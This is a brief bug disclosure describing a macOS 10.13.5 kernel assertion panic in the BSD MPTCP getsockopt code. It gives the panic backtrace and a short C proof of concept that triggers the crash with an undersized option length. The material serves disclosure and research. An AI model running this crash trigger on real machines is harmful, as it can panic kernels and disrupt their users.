NO02: BSD getsockopt, assert failure

Description

This case is of type Assert Failure. Not accepted by apple as vulnerability any more.

Environment

• OS: macOS 10.13.5
• Module: BSD

Panic Report

panic(cpu 0 caller 0xffffff8003df2892): assertion failed: mpo == NULL || sopt->sopt_valsize == sizeof (int), file: /Users/xxxxxxxx/Vuln/myxnu/build-xnu-4570.41.2/xnu-4570.41.2/bsd/netinet/mptcp_subr.c, line: 1113
Backtrace (CPU 0), Frame : Return Address
0xffffff8866f23aa0 : 0xffffff8003943f26 
0xffffff8866f23af0 : 0xffffff8003abcdf4 
0xffffff8866f23b30 : 0xffffff8003aad0a9 
0xffffff8866f23bb0 : 0xffffff80038dc190 
0xffffff8866f23bd0 : 0xffffff80039435fa 
0xffffff8866f23d00 : 0xffffff800394339c 
0xffffff8866f23d60 : 0xffffff8003df2892 
0xffffff8866f23d90 : 0xffffff8003dfa5ef 
0xffffff8866f23e40 : 0xffffff8003f83815 
0xffffff8866f23eb0 : 0xffffff8003f91fc5 
0xffffff8866f23f10 : 0xffffff8003fc6a4b 
0xffffff8866f23fa0 : 0xffffff80038dc976 

BSD process name corresponding to current thread: syz-executor0
Boot args: kext-dev-mode=1 debug=0x146 kcsuffix=development

Mac OS version:
17D47

PoC

#include <iostream>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

#define AF_MULTIPATH 39

int main(int argc, const char * argv[]) {
    int sockfd = socket(AF_MULTIPATH, SOCK_STREAM, IPPROTO_TCP);
    int flag = 0;
    socklen_t len = 1;
    
    setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, (void *)&flag, 4);
    getsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, (void *)&flag, &len);
    
    return 0;
}

Disclaimer

Since this type case is not vulnerability, the vendor(apple) may not fix it. Please don’t use this PoC code to do any malicious things. Just for fun.